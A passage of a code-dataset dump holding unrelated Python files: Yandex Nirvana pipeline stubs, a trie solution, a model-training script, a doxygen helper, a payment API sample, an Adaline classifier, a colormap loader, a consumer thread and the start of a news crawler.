cache: Force cache invalidation\n :param build_type: Build type\n :param host_platform: Host platform\n :param target_platform: Target platform\n :param clear_build: Clear build\n :param sanitize: Build with sanitizer\n :param compress_package_archive: Compress package archive\n :param owner:\n Owner of sandbox task\n :param build_system: Build system\n :param ya_yt_token_vault_owner: YT token vault owner\n :param ya_yt_token_vault_name: YT token vault name\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\nclass BuildArcadiaProjectOutput(typing.NamedTuple):\n arcadia_project: vh3.Executable\n sandbox_task_id: vh3.Text\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/dd4b5735-1ee7-497d-91fc-b81ba8b510fc\")\n@vh3.decorator.nirvana_output_names(arcadia_project=\"ARCADIA_PROJECT\", sandbox_task_id=\"SANDBOX_TASK_ID\")\ndef build_arcadia_project(\n *,\n targets: vh3.String,\n arts: vh3.String,\n arcadia_url: vh3.String = \"arcadia:/arc/trunk/arcadia\",\n arcadia_revision: vh3.Integer = None,\n checkout_arcadia_from_url: vh3.String = None,\n build_type: vh3.Enum[\n typing.Literal[\"release\", \"debug\", \"profile\", \"coverage\",\n \"relwithdebinfo\", \"valgrind\", \"valgrind-release\"]\n ] = \"release\",\n arts_source: vh3.String = None,\n result_single_file: vh3.Boolean = False,\n definition_flags: vh3.String = None,\n sandbox_oauth_token: vh3.Secret = None,\n arcadia_patch: vh3.String = None,\n owner: vh3.String = None,\n use_aapi_fuse: vh3.Boolean = True,\n use_arc_instead_of_aapi: vh3.Boolean = True,\n aapi_fallback: vh3.Boolean = False,\n kill_timeout: vh3.Integer = None,\n sandbox_requirements_disk: vh3.Integer = None,\n sandbox_requirements_ram: vh3.Integer = None,\n sandbox_requirements_platform: vh3.Enum[\n typing.Literal[\n \"Any\",\n \"darwin-20.4.0-x86_64-i386-64bit\",\n \"linux\",\n \"linux_ubuntu_10.04_lucid\",\n \"linux_ubuntu_12.04_precise\",\n \"linux_ubuntu_14.04_trusty\",\n \"linux_ubuntu_16.04_xenial\",\n \"linux_ubuntu_18.04_bionic\",\n \"osx\",\n \"osx_10.12_sierra\",\n \"osx_10.13_high_sierra\",\n \"osx_10.14_mojave\",\n \"osx_10.15_catalina\",\n \"osx_10.16_big_sur\",\n ]\n ] = None,\n checkout: vh3.Boolean = False,\n clear_build: vh3.Boolean = True,\n strip_binaries: vh3.Boolean = False,\n lto: vh3.Boolean = False,\n thinlto: vh3.Boolean = False,\n musl: vh3.Boolean = False,\n use_system_python: vh3.Boolean = False,\n target_platform_flags: vh3.String = None,\n javac_options: vh3.String = None,\n ya_yt_proxy: vh3.String = None,\n ya_yt_dir: vh3.String = None,\n ya_yt_token_vault_owner: vh3.String = None,\n ya_yt_token_vault_name: vh3.String = None,\n result_rt: vh3.String = None,\n timestamp: vh3.Date = None,\n build_system: vh3.Enum[typing.Literal[\"ya\",\n \"ya_force\", \"semi_distbuild\", \"distbuild\"]] = \"ya\"\n) -> BuildArcadiaProjectOutput:\n \"\"\"\n Build Arcadia Project\n\n Launches YA_MAKE task in Sandbox for provided target and downloads requested artifact.\n\n :param targets: Target\n [[Multiple targets with \";\" are not allowed]]\n :param arts: Build artifact\n [[Multiple artifacts with \";\" and custom destination directory with \"=\" are not allowed]]\n :param arcadia_url: Svn url for arcadia\n [[Should not contain revision]]\n :param arcadia_revision: Arcadia Revision\n :param checkout_arcadia_from_url: Full SVN url for arcadia (Overwrites base URL and revision, use @revision to fix revision)\n :param build_type: Build type\n :param arts_source: Source artifacts (semicolon separated pairs path[=destdir])\n [[Какие файлы из Аркадии поместить в отдельный ресурс (формат тот же, что и у build artifacts)]]\n :param result_single_file: Result is a single file\n :param definition_flags: Definition flags\n [[For example \"-Dkey1=val1 ... -DkeyN=valN\"]]\n :param sandbox_oauth_token: Sandbox OAuth token\n [[To run task on behalf of specific user]]\n Name of the secret containing oauth token of user the sandbox task should be launched from\n :param arcadia_patch: Apply patch\n [[Diff file rbtorrent, paste.y-t.ru link or plain text. Doc: https://nda.ya.ru/3QTTV4]]\n :param owner: Custom sandbox task owner (should be used only with OAuth token)\n [[OAuth token owner should be a member of sandbox group]]\n :param use_aapi_fuse: Use arcadia-api fuse\n :param use_arc_instead_of_aapi: Use arc fuse instead of aapi\n :param aapi_fallback: Fallback to svn/hg if AAPI services are temporary unavailable\n :param kill_timeout: Kill Timeout (seconds)\n :param sandbox_requirements_disk: Disk requirements in Mb\n :param sandbox_requirements_ram: RAM requirements in Mb\n :param sandbox_requirements_platform: Platform\n :param checkout: Run ya make with --checkout\n :param clear_build: Clear build\n :param strip_binaries: Strip result binaries\n :param lto: Build with LTO\n :param thinlto: Build with ThinLTO\n :param musl: Build with musl-libc\n :param use_system_python: Use system Python to build python libraries\n :param target_platform_flags: Target platform flags (only for cross-compilation)\n :param javac_options: Javac options (semicolon separated)\n :param ya_yt_proxy: YT store proxy\n :param ya_yt_dir: YT store cypress path\n :param ya_yt_token_vault_owner: YT token vault owner\n :param ya_yt_token_vault_name: YT token vault name\n :param result_rt: Result resource type\n :param timestamp: Timestamp\n :param build_system: Build System\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\n@vh3.decorator.external_operation(\"https://nirvana.yandex-team.ru/operation/f42eeefa-4f48-43cc-9472-47a9c8c7ced3\")\n@vh3.decorator.nirvana_names_transformer(vh3.name_transformers.snake_to_dash, options=True)\ndef antifraud_update_collapsed_aggrs(\n *,\n yt_token: vh3.Secret,\n batch_size: vh3.Integer,\n timeout_sec: vh3.Integer,\n host: vh3.String,\n retry_delay_sec: vh3.Number,\n retries: vh3.Integer,\n exe: vh3.Executable,\n src: vh3.MRTable,\n mr_default_cluster: vh3.Enum[\n typing.Literal[\n \"hahn\",\n \"freud\",\n \"marx\",\n \"hume\",\n \"arnold\",\n \"markov\",\n \"bohr\",\n \"landau\",\n \"seneca-vla\",\n \"seneca-sas\",\n \"seneca-man\",\n ]\n ] = \"arnold\"\n) -> None:\n \"\"\"\n Antifraud update collapsed aggrs\n\n :param yt_token: YT Token:\n [[ID of Nirvana Secret with YT access token (https://nda.ya.ru/3RSzVU).\n Guide to Nirvana Secrets: https://nda.ya.ru/3RSzWZ]]\n YT OAuth Token.\n\n [Obtain access token](https://nda.ya.ru/3RSzVU), then [create a Nirvana secret](https://nda.ya.ru/3RSzWZ) and [use it here](https://nda.ya.ru/3RSzWb).\n You can [share the secret](https://nda.ya.ru/3RSzWd) with user(s) and/or a staff group.\n :param mr_default_cluster: Default YT cluster:\n [[Default YT cluster]]\n \"\"\"\n raise NotImplementedError(\"Write your local execution stub here\")\n\n\nYQL_JOIN = \"\"\"PRAGMA yson.DisableStrict;\nPRAGMA yson.AutoConvert;\nPRAGMA yt.InferSchema = '1';\nPRAGMA yt.Pool = \"processing-mail-so\";\nPRAGMA AnsiInForEmptyOrNullableItemsCollections;\n\n$source = (\n SELECT Yson::LookupString(nsrc, \"txn_extid\") as id,\n Yson::LookupString(nsrc, \"transaction_type\") as transaction_type,\n channel_uri,\n storage_service,\n nsrc,\n request,\n rbl,\n lua_resolution,\n queues\n FROM {{input1}}\n);\n\n$scores = (SELECT * FROM $source WHERE request = \"score\" AND transaction_type in (\"BINDING\", \"COMMON_PAYMENT\", \"AUTH\"));\n$saves = (SELECT * FROM $source WHERE request = \"save\");\n\nINSERT INTO {{output1}}\nSELECT\n scores.id as id,\n scores.channel_uri as channel_uri,\n scores.storage_service as storage_service,\n scores.rbl as rbl,\n scores.nsrc as score_data,\n scores.lua_resolution as lua_resolution,\n scores.queues as queues,\n saves.nsrc as save_data\nFROM $scores AS scores\nLEFT JOIN $saves AS saves\nUSING(id);\"\"\"\n\nMR_ACCOUNT = \"so_fml\"\nYT_TOKEN = \"luckybug_nirvana_token\"\nYQL_TOKEN = \"luckybug_yql_token\"\n\n\n@vh3.decorator.graph()\ndef collapse_daily_aggregates() -> None:\n src = get_mr_table(\n table=\"//logs/mail-so-antifraud-log/1d/2022-03-30\", cluster=\"arnold\")\n\n joined = yql_1(input1=[src], request=YQL_JOIN, yt_token=YT_TOKEN,\n yql_token=YQL_TOKEN, mr_account=MR_ACCOUNT)\n\n runner = ya_package(\n packages=\"mail/so/daemons/antifraud/antifraud_runner/package.json\", arcadia_revision=9301950)\n\n updater = build_arcadia_project(targets=\"mail/so/daemons/antifraud/nirvana/update_collapsed_aggrs\",\n arts=\"mail/so/daemons/antifraud/nirvana/update_collapsed_aggrs/update_collapsed_aggrs\",\n arcadia_revision=9301950)\n\n aggrs = antifraud_runner(\n bundle_tar_gz=runner, src=joined.output1, yt_token=YT_TOKEN, mr_account=MR_ACCOUNT)\n\n return antifraud_update_collapsed_aggrs(exe=updater.arcadia_project,\n src=aggrs,\n yt_token=YT_TOKEN,\n batch_size=1000,\n timeout_sec=10,\n retries=10,\n retry_delay_sec=0.5,\n host=\"http://so-fraud-producer.pers.yandex.net\")\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/test_vh/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":27807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28375999615","text":"class TrieNode:\n def __init__(self):\n self.next = {}\n self.is_word = False\n \n\nclass StreamChecker:\n\n def __init__(self, words: List[str]):\n self.s = ''\n self.root = TrieNode()\n \n for word in words:\n self.insert(word[::-1])\n \n\n def query(self, letter: str) -> bool:\n self.s = letter + self.s\n node = self.root\n for ch in self.s:\n if ch not in node.next:\n return False\n node = node.next[ch]\n if node and node.is_word:\n return True\n return False\n \n \n def insert(self, word):\n node = self.root\n for ch in word:\n node = node.next.setdefault(ch, TrieNode())\n node.is_word = True\n\n\n# Your StreamChecker object will be instantiated and called as such:\n# obj = StreamChecker(words)\n# param_1 = obj.query(letter)","repo_name":"dreamjean/LeetCode-JavaScript","sub_path":"1032-stream-of-characters/1032-stream-of-characters.py","file_name":"1032-stream-of-characters.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4757118955","text":"import os\nos.environ['TOKENIZERS_PARALLELISM'] = 'false'\nos.environ['ROUGE_HOME'] = os.path.expanduser('~/faith-sum/eval/ROUGE-1.5.5/')\n\nimport argparse\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint\nfrom pytorch_lightning import loggers as pl_loggers\nfrom pytorch_lightning.plugins import DDPPlugin\nimport torch\nfrom transformers import AutoTokenizer\n\nfrom global_utils import get_free_gpus, set_same_seed\nfrom rank.dataset import RankDataModule\nfrom rank.model import SummaryRanker\n\n\ndef build_tokenizer(max_num_sents=200):\n tokenizer = AutoTokenizer.from_pretrained('roberta-base')\n add_tokens = [f'' for i in range(max_num_sents)]\n special_tokens_dict = {'additional_special_tokens': add_tokens}\n tokenizer.add_special_tokens(special_tokens_dict)\n return tokenizer\n\n\ndef run(args):\n if args.gpu_device is not None:\n gpus = [args.gpu_device]\n else:\n gpus = get_free_gpus() if torch.cuda.is_available() and not args.cpu else None\n assert gpus is None or len(gpus) > 0\n if gpus is not None and (args.debug or args.find_lr):\n gpus = [gpus[0]]\n if gpus is not None and len(gpus) > args.max_gpus:\n gpus = gpus[:args.max_gpus]\n if gpus is not None:\n gpu_str = ','.join([str(x) for x in gpus])\n print(f'Using GPUS --> {gpu_str}...')\n\n args.num_gpus = None if gpus is None else len(gpus)\n print('Num GPUs --> {}'.format(args.num_gpus))\n precision = 16 if args.num_gpus is not None else 32\n experiment_dir = os.path.join(args.weight_dir, args.experiment, 'rank')\n os.makedirs(os.path.join(experiment_dir, 'wandb'), exist_ok=True) # Only way to make sure it's writable\n\n tokenizer = build_tokenizer(max_num_sents=args.max_num_sents)\n model = SummaryRanker(args, tokenizer)\n datamodule = RankDataModule(args, tokenizer=tokenizer)\n\n logger = pl_loggers.WandbLogger(\n name=args.experiment,\n save_dir=experiment_dir,\n offline=args.debug or args.offline,\n project='rerank',\n entity='griffinadams',\n )\n\n primary_eval_metric = 'val/score'\n primary_metric_mode = 'max' # Higher is better ('min' for val_loss)\n checkpoint_callback = ModelCheckpoint(\n monitor=primary_eval_metric,\n save_top_k=1,\n save_last=False,\n mode=primary_metric_mode\n )\n # early_stopping = EarlyStopping(primary_eval_metric, mode=primary_metric_mode, patience=5, verbose=True)\n callbacks = [checkpoint_callback]\n if not (args.no_schedule or args.debug or args.find_lr):\n lr_monitor = LearningRateMonitor(logging_interval='step')\n callbacks.append(lr_monitor)\n plugins = DDPPlugin(find_unused_parameters=False) if args.num_gpus is not None and args.num_gpus > 1 else None\n trainer = pl.Trainer.from_argparse_args(\n args,\n resume_from_checkpoint=args.restore_path,\n callbacks=callbacks,\n logger=logger,\n precision=precision,\n accelerator=None if args.num_gpus is None or args.num_gpus == 1 else 'ddp',\n gpus=gpus,\n default_root_dir=experiment_dir,\n gradient_clip_val=0.1,\n accumulate_grad_batches=args.grad_accum,\n val_check_interval=1.0 if args.debug else 0.1,\n num_sanity_val_steps=0 if args.debug else 2,\n log_every_n_steps=10,\n max_steps=args.max_steps,\n plugins=plugins,\n )\n\n if args.find_lr:\n lr_finder = trainer.tuner.lr_find(model, min_lr=1e-4, max_lr=1e-2, update_attr=True, num_training=100)\n print(lr_finder.results)\n else:\n print('Starting training...')\n trainer.fit(model, datamodule=datamodule)\n print(f'Best weights saved --> {checkpoint_callback.best_model_path}')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Summarization Re-Ranker.')\n\n # Configuration Parameters\n parser.add_argument('-debug', default=False, action='store_true')\n parser.add_argument('--experiment', default='default')\n parser.add_argument('--dataset', default='cnn_dailymail')\n parser.add_argument('--restore_path', default=None)\n parser.add_argument('--seed', default=1992, type=int)\n parser.add_argument('--max_gpus', default=1, type=int)\n parser.add_argument('-cpu', default=False, action='store_true')\n parser.add_argument('--max_val_examples', default=1024, type=int)\n parser.add_argument('--gpu_device', default=None, type=int)\n parser.add_argument('--data_dir', default='/nlp/projects/faithsum')\n parser.add_argument('--gen_experiment', default='gen_extract_full_ar_mask_red_feat')\n parser.add_argument('-no_schedule', default=False, action='store_true')\n parser.add_argument('-offline', default=False, action='store_true')\n parser.add_argument('-find_lr', default=False, action='store_true')\n # How many processes to use when loading batches on CPU\n parser.add_argument('--num_dataloaders', default=8, type=int)\n parser.add_argument('--summary_style', default='extract', choices=['extract', 'abstract', 'from_extract'])\n\n # Hyper-parameters\n parser.add_argument('--lr', type=float, default=1e-5)\n parser.add_argument('--batch_size', type=int, default=2)\n parser.add_argument('--grad_accum', type=int, default=4)\n parser.add_argument('--warmup_steps', type=int, default=200)\n parser.add_argument('--max_steps', default=100000, type=int)\n parser.add_argument('--max_epochs', default=20, type=int)\n parser.add_argument('--weight_decay', type=float, default=0)\n parser.add_argument('--max_input_length', type=int, default=512)\n parser.add_argument('--max_num_sents', type=int, default=200)\n\n args = parser.parse_args()\n\n args.weight_dir = os.path.join(args.data_dir, 'weights')\n os.makedirs(args.weight_dir, exist_ok=True)\n\n # Set same random seed for each run\n set_same_seed(args.seed)\n run(args)\n","repo_name":"griff4692/faith-sum","sub_path":"rank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14818574469","text":"#!/usr/bin/env python3\n## @package process\n# Module doxygen.process\n# Script to insert preamble for doxygen and regen API docs\n\nimport os\nimport shutil\n\n\n# Module caffe2...caffe2.python.control_test\ndef insert(originalfile, first_line, description):\n with open(originalfile) as f:\n f1 = f.readline()\n if f1.find(first_line) < 0:\n docs = first_line + description + f1\n with open(\"newfile.txt\", \"w\") as f2:\n f2.write(docs)\n f2.write(f.read())\n os.rename(\"newfile.txt\", originalfile)\n else:\n print(\"already inserted\")\n\n\n# move up from /caffe2_root/doxygen\nos.chdir(\"..\")\nos.system(\"git checkout caffe2/contrib/.\")\nos.system(\"git checkout caffe2/distributed/.\")\nos.system(\"git checkout caffe2/experiments/.\")\nos.system(\"git checkout caffe2/python/.\")\n\nfor root, dirs, files in os.walk(\".\"):\n for file in files:\n if (\n file.endswith(\".py\")\n and not file.endswith(\"_test.py\")\n and not file.endswith(\"__.py\")\n ):\n filepath = os.path.join(root, file)\n print(\"filepath: \" + filepath)\n directory = os.path.dirname(filepath)[2:]\n directory = directory.replace(\"/\", \".\")\n print(\"directory: \" + directory)\n name = os.path.splitext(file)[0]\n first_line = \"## @package \" + name\n description = \"\\n# Module \" + directory + \".\" + name + \"\\n\"\n print(first_line, description)\n insert(filepath, first_line, description)\n\nif os.path.exists(\"doxygen/doxygen-python\"):\n print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n shutil.rmtree(\"doxygen/doxygen-python\")\nelse:\n os.makedirs(\"doxygen/doxygen-python\")\n\nif os.path.exists(\"doxygen/doxygen-c\"):\n print(\"Looks like you ran this before, so we need to cleanup those old files...\")\n shutil.rmtree(\"doxygen/doxygen-c\")\nelse:\n os.makedirs(\"doxygen/doxygen-c\")\n\nos.system(\"doxygen .Doxyfile-python\")\nos.system(\"doxygen .Doxyfile-c\")\n","repo_name":"pytorch/pytorch","sub_path":"docs/caffe2/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"26940093572","text":"# 스택/큐 - 기능 개발\n\ndef solution(progresses, speeds):\n count = 0\n answer = []\n while len(progresses) > 0:\n if progresses[0] >= 100:\n while len(progresses) > 0 and progresses[0] >= 100:\n progresses.pop(0)\n speeds.pop(0)\n count += 1\n answer.append(count)\n count = 0\n else:\n for j in range(len(progresses)):\n progresses[j] += speeds[j]\n\n return answer\n\n\nif __name__ == \"__main__\":\n aa, bb = input().strip('[]').split('], [')\n aa = list(map(int, aa.split(',')))\n bb = list(map(int, bb.split(',')))\n print(solution(aa, bb))","repo_name":"norzest/Python_basic","sub_path":"Programmers/고득점Kit/Stack&Queue2.py","file_name":"Stack&Queue2.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5262274061","text":"from odoo import api, fields, models\n\n\nclass PricelistSimulation(models.TransientModel):\n _name = \"wizard.preview.pricelist\"\n _description = \"wizard - Preview Pricelist\"\n\n @api.model\n def default_get(self, fields):\n vals = super().default_get(fields)\n if self.env.context.get(\"active_model\") == \"product.template\":\n vals[\"template_id\"] = self.env.context.get(\"active_id\")\n else:\n active_id = self.env.context.get(\"active_id\")\n product = self.env[\"product.product\"].browse(active_id)\n vals[\"product_id\"] = product.id\n vals[\"template_id\"] = product.product_tmpl_id.id\n return vals\n\n template_id = fields.Many2one(\n comodel_name=\"product.template\", string=\"Product Template\", readonly=True\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n domain=\"[('product_tmpl_id', '=', template_id)]\",\n string=\"Product Variant\",\n )\n product_qty = fields.Float(string=\"Quantity\", default=1, required=True)\n price_date = fields.Date(\n string=\"Date\", default=fields.Date.context_today, required=True\n )\n line_ids = fields.One2many(\n string=\"Simulation Lines\",\n comodel_name=\"wizard.preview.pricelist.line\",\n inverse_name=\"simulation_id\",\n compute=\"_compute_line_ids\",\n )\n variant_count = fields.Integer(\n string=\"Variants Count\", compute=\"_compute_variant_count\"\n )\n\n @api.depends(\"template_id\", \"product_id\", \"product_qty\", \"price_date\")\n def _compute_line_ids(self):\n self.ensure_one()\n pricelists = self.env[\"product.pricelist\"].search(\n [(\"show_in_simulation\", \"=\", True)],\n )\n line_ids_vals = []\n for variant in self.product_id or self.template_id.product_variant_ids:\n for pricelist in pricelists:\n vals = self._prepare_simulation_lines_vals(variant, pricelist)\n line_ids_vals.append((0, False, vals))\n self.line_ids = line_ids_vals\n\n def _prepare_simulation_lines_vals(self, variant, pricelist):\n pricelist_id = pricelist.id\n price = pricelist._price_get(variant, self.product_qty)\n price = price[pricelist_id]\n return {\n \"product_id\": variant.id,\n \"pricelist_id\": pricelist.id,\n \"price\": price,\n }\n\n @api.depends(\"template_id\")\n def _compute_variant_count(self):\n self.ensure_one()\n self.variant_count = 1\n if not self.product_id:\n self.variant_count = len(self.template_id.product_variant_ids)\n\n\nclass PricelistSimulationLine(models.TransientModel):\n _name = \"wizard.preview.pricelist.line\"\n _description = \"wizard - Preview Pricelist Line\"\n\n simulation_id = fields.Many2one(\n string=\"Simulation\",\n comodel_name=\"wizard.preview.pricelist\",\n )\n product_id = fields.Many2one(\n comodel_name=\"product.product\",\n string=\"Product Variant\",\n readonly=True,\n )\n pricelist_id = fields.Many2one(\n comodel_name=\"product.pricelist\",\n string=\"Pricelist\",\n readonly=True,\n )\n currency_id = fields.Many2one(\n comodel_name=\"res.currency\",\n related=\"pricelist_id.currency_id\",\n string=\"Currency\",\n readonly=True,\n )\n price = fields.Monetary(\n string=\"Unit Price\",\n digits=\"Price\",\n readonly=True,\n currency_field=\"currency_id\",\n )\n","repo_name":"OCA/product-attribute","sub_path":"product_pricelist_simulation/wizards/wizard_preview_pricelist.py","file_name":"wizard_preview_pricelist.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"72"} +{"seq_id":"206774043","text":"import re\nimport utils\n\n\nclass Colormap:\n def __init__(self, mapType, extras=False):\n self.mapType = mapType\n self.colors = {}\n with open(\"colormaps/{0}.txt\".format(mapType)) as f:\n for line in f.readlines():\n # self.count +=1\n simpleMatch = re.search(\n '([a-zA-Z0-9 \\'\\-\\(\\)\\[\\]]+)([0-9]+)? +(\\#[a-zA-Z0-9]{6})', line)\n extrasMatch = re.search(\n '([a-zA-Z \\(\\)]+) (\\#[a-zA-Z0-9]{6}) ([a-zA-Z0-9 \\*\\#]+)?', line)\n nbsMatch = re.search(\n '([a-zA-Z ]+) (\\#[0-9A-Z]{6}) (\\#[0-9A-Z]+) ([A-Za-z ]+) ?(\\*OUT)? ?(\\*IGNORE0)? ?(\\*\\#[0-9A-Z]+.+)?', line)\n\n if simpleMatch:\n name, num, hexVal = simpleMatch.groups()\n if num:\n name = name + num\n # If there are colors with the same hex but a different\n # name, combine their dictionary values instead of\n # replacing them\n if hexVal in self.colors.keys():\n self.colors[hexVal].append(name)\n else:\n self.colors[hexVal] = [name.strip()]\n # # elif extras and extrasMatch:\n # # name, hexVal, extra = extrasMatch.groups()\n # # self.colors[hexVal] = (name, extra)\n # # elif extras and nbsMatch:\n # # if \"OUT\" not in nbsMatch.groups():\n # # name, mundieHex, fosterHex, group = nbsMatch.groups()\n # # else:\n # # name, mundieHex, fosterHex, group, gamutException = nbsMatch.groups()\n # # if \"IGNORE0\" not in nbsMatch.groups():\n # # self.colors[mundieHex] = name\n # # self.colors[fosterHex] = name\n # # name, mundieHex, fosterHex, group, inGamut, = nbsMatch.groups()\n # else:\n # if not line.startswith(';'):\n # print \"X \", line\n\n def toRGB(self):\n \"\"\"Converts a Colormap\"\"\"\n newColors = {}\n for key, val in self.colors.items():\n if utils.validHex(key):\n key = utils.hex2rgb(key)\n newColors[key] = val\n self.colors = newColors\n return self\n\n def isMapType(self, requestedMapType):\n return self.mapType == requestedMapType\n","repo_name":"szellner/Polychrome","sub_path":"colormap.py","file_name":"colormap.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69969065832","text":"import iyzipay\n\noptions = {\n 'api_key': iyzipay.api_key,\n 'secret_key': iyzipay.secret_key,\n 'base_url': iyzipay.base_url\n}\n\nrequest = {\n 'locale': 'tr',\n 'conversationId': '123456789',\n 'binNumber': '554960'\n}\n\nbin_number = iyzipay.BinNumber().retrieve(request, options)\n\nprint(bin_number.read().decode('utf-8'))\n","repo_name":"iyzico/iyzipay-python","sub_path":"samples/retrieve_bin.py","file_name":"retrieve_bin.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"72"} +{"seq_id":"1905506444","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.random import seed\n\n\n\n\nclass AdaLineGD(object):\n def __init__(self,eta = 0.01, n_iter = 30,shuffle = True, random_state=None):\n self.eta = eta\n self.n_iter = n_iter\n self.shuffle = shuffle\n self.w_inited = False\n if random_state:\n seed(random_state)\n\n def net_input(self,X):\n return np.dot(X, self._w[1:]) + self._w[0]\n\n def _shuffle(self, X, y):\n r = np.random.permutation(len(y))\n return X[r],y[r]\n def _init_weight(self, m):\n self._w = np.zeros(m + 1)\n self.w_inited = True\n def _update_weight(self, xi, target):\n output = self.net_input(xi)\n error = target - output\n self._w[1:] += self.eta * xi.dot(error)\n self._w[0] += self.eta * error\n cost = 0.5 * error ** 2\n return cost\n def fit(self, X, y):\n self._init_weight(X.shape[1])\n self.cost = []\n for _ in range(self.n_iter):\n if self.shuffle:\n X, y = self._shuffle(X, y)\n cost = []\n for xi, target in zip(X, y):\n cost.append(self._update_weight(xi, target))\n avg_cost = sum(cost) / len(y)\n self.cost.append(avg_cost)\n return self\n\n def partial_fit(self, X, y):\n if not self.w_inited:\n self._init_weight(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, y):\n self._update_weight(xi, target)\n else:\n self._update_weight(X, y)\n return self\n\n def activation(self,X):\n return self.net_input(X)\n\n def predict(self,xi):\n return np.where(self.activation(xi) >= 0.0,1,-1)\n\n\ndf = pd.read_csv('https://archive.ics.uci.edu/ml/'\n 'machine-learning-databases/iris/iris.data', header = None)\n\ny = df.iloc[0:400,4].values\ny = np.where(y == 'Iris-setosa', -1, 1)\nX = df.iloc[0:400, [0,2]].values\n\nX_std = np.copy(X)\nX_std[:,0] = (X[:,0] - X[:,0].mean())/ X[:,0].std()\nX_std[:,1] = (X[:,1] - X[:,1].mean())/ X[:,1].std()\n\n\nfig, ax = plt.subplots(nrows =1, ncols = 1, figsize=(8,3))\n\nada1 = AdaLineGD(eta= 0.001).fit(X_std, y)\nax.plot(range(1, 1 + len(ada1.cost)), np.log10(ada1.cost), marker = 'o')\nax.set_xlabel(\"Epoch\")\nax.set_ylabel(\"log(Sum-squared-error)\")\nax.set_title('Adaline - Learning rate 0.001')\n\nplt.show()","repo_name":"TheOneAC/ML","sub_path":"sklearn/AdaLineSGD.py","file_name":"AdaLineSGD.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74464365672","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread, currentThread\nimport time\n\nclass Consumer(Thread):\n \"\"\"\n Class that represents a consumer.\n \"\"\"\n\n def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n :type carts: List\n :param carts: a list of add and remove operations\n\n :type marketplace: Marketplace\n :param marketplace: a reference to the marketplace\n\n :type retry_wait_time: Time\n :param retry_wait_time: the number of seconds that a producer must wait\n until the Marketplace becomes available\n\n :type kwargs:\n :param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n\n Thread.__init__(self, **kwargs)\n self.carts = carts\n self.marketplace = marketplace\n self.retry_wait_time = retry_wait_time\n\n def run(self):\n for cart in self.carts:\n id_cart = self.marketplace.new_cart()\n for operation in cart:\n op_count = 0\n while op_count < operation['quantity']:\n if operation['type'] == 'add':\n if self.marketplace.add_to_cart(id_cart, operation['product']) is False:\n time.sleep(self.retry_wait_time) #reincearca pana reusesc toate operatiile\n else:\n op_count += 1\n elif operation['type'] == 'remove':\n self.marketplace.remove_from_cart(id_cart, operation['product'])\n op_count += 1\n\n products_in_cart = self.marketplace.place_order(id_cart)\n for product in products_in_cart: #afiseaza produsele din cart\n print(currentThread().getName() + \" bought \" + str(product))\n","repo_name":"Andrei-Mocanu/Tema1ASC","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13773557799","text":"import awscli\r\nimport datetime\r\nimport boto3\r\nimport requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\ns3 = boto3.resource('s3')\r\n##파일 업로드 \r\n# data = open('13_AsynchronousSiteTest_1.json','rb')\r\n# s3.Bucket('zoomstudy').put_object(Key = 'python/13_AsynchronousSiteTest_2.json', Body = data )\r\n\r\n##파일 다운로드\r\n# s3.Bucket('zoomstudy').download_file('13_AsynchronousSiteTest_1.json','13_newsCrawling.json')\r\n\r\n##test ) 일주일 뉴스 타이틀과 요약내용 크롤링 해서 날짜별로 파일을 만들어 s3스토리지에 저장하기\r\n\r\n\r\nheaders = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"\r\n}\r\n\r\n\r\ndate = datetime.datetime.strptime('20230114','%Y%m%d')\r\n\r\nfor i in range(7):\r\n date_str = date.strftime('%Y%m%d')\r\n page = 1\r\n\r\n news = []\r\n\r\n while True:\r\n \r\n\r\n print(date_str, page)\r\n \r\n \r\n url = f'https://news.naver.com/main/list.naver?mode=LPOD&mid=sec&oid=003&date={date_str}&page={page}'\r\n\r\n\r\n \r\n response = requests.get(url,headers=headers)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n if str(page) != soup.select_one('div.paging strong').text.strip():\r\n break\r\n\r\n\r\n for news_data in 